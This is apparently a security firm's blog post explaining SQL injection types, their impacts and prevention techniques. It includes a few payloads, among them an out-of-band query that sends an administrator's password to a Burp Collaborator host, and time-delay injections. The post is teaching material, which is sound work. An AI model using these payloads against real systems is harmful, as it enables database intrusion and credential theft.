The Ultimate Guide to SQL Injection
admin
In today’s world, data is an essential asset for most businesses. From financial data to
customer information, databases are used to store vast amounts of sensitive data.
However, these databases are also vulnerable to attacks, and SQL injection is one of
these attacks.
In this blog post, we will explore the ins and outs of SQL injection, including what it is and how it
works, the types of SQL injection, and what you can do to prevent it from happening to your
organization. We’ll also provide real-life examples of SQL injection attacks and their impact.
So buckle up and let’s dive into the world of SQL injection.
Overview of SQL Injection
SQL injection is malicious SQL queries by exploiting application vulnerabilities.
Additionally, SQL injection is a code injection technique that can be getting important information
from your database. SQLi can go as far as destroying your database. The following things could be
done with SQLi:
An SQL Injection vulnerability could allow the attacker to gain full access to the database
server.
SQL injection also could allow changing the data in the database. For instance, an attacker
could use SQL Injection to change balances or transfer money to their account in a financial
application.
SQLi can be used to delete records and deleting data can affect application accessibility until
the database is restored.
An operating system can be accessed using a database server on some database servers.
An application is vulnerable if:
The data provided by the user is not verified, filtered, or sterilized by the application.
Dynamic queries or non-parameterized functions executed with no context-sensitive escaping
are used straight in the interpreter.
Dangerous data is used in the object-relational mapping (ORM) search parameters to get
valuable, important records.
The basis of a code injection vulnerability is the lack of validation and sanitization of the data used
by the web application. This vulnerability could be existing on almost any type of technology related
to websites. Anything that accepts parameters as input can potentially be vulnerable to an injection
attack.
In our AppSec blog series [Part 3], we talked about OWASP Top 10. In correlation to OWASP
Top10, in this blog post, we will be talking about A1 – Injection in detail.
What is SQL Injection?
SQL injection is a code injection technique that can be getting important information
from your database. SQLi can go as far as destroying your database.
OWASP TOP 10:
A1 – Injection
A2 – Broken Authentication
A3 – Sensitive Data Exposure
A4 – XML External Entities (XXE)
A5 – Broken Access Control
A6 – Security Misconfiguration
A7 – Cross-Site Scripting (XSS)
A8 – Insecure Deserialization
A9 – Using Components with Known Vulnerabilities
A10 – Insufficient Logging & Monitoring
This article may interest you: What is OWASP?
Types of SQLi
SQL injections are generally divided into the following categories: In-band SQLi (Classic),
Inferential SQLi (Blind), and Out-of-band SQLi. We can classify SQL injection types based on the
methods they use to access backend data and their damage potential.
SQL Injection Classification
We can classify SQL injection types based on the methods they use to access backend
data and their damage potential.
SQL Injection Types:
1. In-band SQLi
2. Out-of-band SQLi
3. Inferential SQLi (Blind SQLi)
1. In-band SQLi
In-band SQL Injection occurs when an attacker can use the same communication channel to launch
the attack and gather results.
a. Error based
Error-based injections give insight into the database. These errors can be helpful to developers and
network administrators but must be restricted on the application side.
Example: If the server responds to this URL with an SQL error, it shows the server has connected
to the database in an insecure way. After this step, some of the SQL commands can be run to
tamper with or destroy the database.
b. Union-based
It is a type of injection that combines the results of two or more SELECT statements into a single
result using the UNION operator to get more information from the database.
Example: The below example shows an attacker can get the number of columns using this type of
injection attack.
2. Out-of-band SQLi
Out-of-band SQL injection occurs when an attacker is unable to use the same channel to launch the
attack and gather results. The database server can send data to an attacker with the ability to make
DNS or HTTP requests.
Suppose that the application’s response does not depend on whether the query returns any data,
whether a database error occurs, or the time taken to execute the query. We can trigger out-of-band
network interactions for this application that we control. These can be triggered conditionally,
depending on an injected condition, to infer information one bit at a time.
Moreover, various network protocols can be used to leak data from network interactions. The visual
here shows that the query was sent to the application’s database via the web application. At that
time, the listening server on the network captures information of some DNS and HTTP interactions
of database out band requests.
We can use Burp Collaborator while using out-of-band techniques. Inferential SQLi (Blind SQLi)
allows you to detect when network interactions occur because of sending individual payloads to a
vulnerable application and lists the DNS, and HTTP Protocols interactions. Burp Collaborator is
built into Burp Suite. The techniques for triggering a DNS query are highly specific to the type of
database being used. For example, the query used in the next example triggers the target MySQL
database.
Example: DNS Based Exfiltration
SELECT+password+FROM+users+WHERE+username%3d’administrator INTO OUTFILE ‘\
qwqdu0hle7fue507e75dfaenler4ft.burpcollaborator.net\a’
OOB SQL injection data could exfiltration from an outbound channel using DNS or HTTP protocol.
In this example, the DNS protocol was used, and the Burp Collaborator server is used to listen and
capture outbound requests initiated from the database system. This query was created thinking of
the target database is MySQL.
This query reads the password for the Administrator user, appends a Collaborator subdomain, and
triggers a DNS lookup. The DNS lookup result will be like the following, we could see the password
that belongs to the administrator.
The following items may cause to use of OOB injection:
Lack of input validation in web applications.
Target database in a network environment that allows sending outgoing requests (DNS,
HTTP) without security restrictions.
Sufficient privileges to initiate an outbound request.
The following methods can be used to prevent OOB SQLi:
Input validation for client and server-side.
Proper error handling to avoid displaying detailed error information.
Review network and security architecture design.
Assigning the database account based on the least privilege principle.
Implementation of a Web Application Firewall (WAF) and Intrusion Prevention System (IPS)
for security control.
Continuous monitoring for anomaly and proper incident response processes as the safety net
of the controls.
3. Inferential SQLi (Blind SQLi)
In the Inferential SQLi attack, the attacker cannot see the results because the web application
database is not transmitting the data. For this reason, the attacker sends queries and tries to build
the structure of the database by observing the web application’s response and the behavior of the
database.
a. Boolean-based
This technique forces different responses to get from the application, depending on whether the
query returns correct or incorrect results by sending queries to the database.
Example: As in the first query, we can estimate the length of the database with Boolean
expressions based on the answers returned from the database. And of course, we can even find out
its name by furthering a query like this. With a query like in the second example, we can ensure that
all items in the x category are displayed from the database.
b. Time-based
This technique forces the database to wait for a while before responding after the query is
submitted.
Example: With this technique, we can query whether the user is a system admin from the
returned response time using a time-based query with a conditional query as in the first example.
Or we can determine that the database type is MySQL from the slowness of the response time
returned by using an example such as the second query and a query such as if the database version
is equal to MYSQL 5.
SELECT * FROM products WHERE id=1; IF SYSTEM_USER=’sa’ WAIT FOR DELAY
’00:00:15’
SELECT * FROM card WHERE id=1-IF(MID(VERSION(),1,1) = ‘5’, SLEEP(15), 0)
Simple SQL Injection Example
SQL injection usually occurs when you ask a user for input, like their username/user ID, and
instead of a name/id, the user gives you an SQL statement that you will unknowingly run on your
database.
Look at the following example which creates a SELECT statement by adding a variable (txtUserId)
to a select string. The variable is fetched from user input (getRequestString):
Real-Life SQL Injection Attack Examples
Over the past 20 years, many SQL injection attacks have targeted large websites, businesses, and
social media platforms. Some of these attacks led to serious data breaches. A few notable examples
are listed below:
Example 1
Assume that there is a comment system that works for many platforms such as WordPress, Tumblr,
and Blogger.
On this platform, we can host our sites on the dashboard, and when we navigate to our site, the ID
value of the site returns on the URL.
Assume that our site has a vulnerable URL with our ID. With the following query, we can provide
full database access that holds private users.
For example:
The query for getting the database version:
The query for getting all tables in the database:
[i.e https://hackerone.com/reports/1046084]
Example 2
Suppose that an application has a SQL Injection vulnerability on the API endpoint and on the input
that takes a parameter.
We can detect this vulnerability by triggering a time delay and then observing the response time
with the payloads such as the following payload.
1111′ waitfor delay ’00:00:20′–
Then we can go further, such as getting database users with the help of the tools used for
exploitation.
Impact of SQL Injection Attacks
The attacker injects a malicious query into the web application’s vulnerable entry point. The form,
HTTP header, or session ID could be vulnerable. So, the attacker can use these security
vulnerabilities. For instance, the web application could be commercial, financial, related to
banking, etc. In this way, the attacker could access confidential information related to the content
of the web application.
Assume that the web application is related to banking and the attacker is the administrator. In this
case, the attacker can access the customer account information from the bank database with a
malicious query. This can cause critical damage to a bank.
If the attack is successful, the following situations can occur:
Stealing credentials: SQL injections can be used to obtain users’ credentials. Attackers can
access their privileges and then pose as these users.
Accessing database: Attackers can use SQL injections to reach information stored in a
database server.
Altering data: Attackers can use SQL injections to modify or destroy the accessed database.
Accessing networks: Attackers can use SQL injections to access database servers with
operating system privileges. Then, the attacker can try to access the network.
How to Prevent Injection?
SQL Injection vulnerabilities can be prohibited with special prevention techniques according to the
subtype of SQLi vulnerability, SQL database engine, and programming language. However, the
general principles you can follow to keep your web application secure are as follows:
Primary Defenses:
Option 1: Using Prepared Statements
Option 2: Using Stored Procedures
Option 3: Using Whitelist for Inputs
Option 4: Not Using User Inputs
Additional Defenses:
Option 1: Using Least Privilege
Option 2: Performing Whitelist Input Validation
Conclusion
In this article, we have explained what SQL injection is and the different types of SQL injection.
SQL injection is a serious threat to any organization that relies on databases to store sensitive
information. It is essential to understand the different types of SQL injection attacks and how they
work in order to prevent them from happening to your organization. By following best practices,
you can significantly reduce the risk of SQL injection vulnerabilities.
In the next blog posts, we will be talking about detailed examples of SQL injection types.
At PurpleBox, we offer Vulnerability Management and Penetration Testing services to help you stay
secure.
Contact us today to learn more.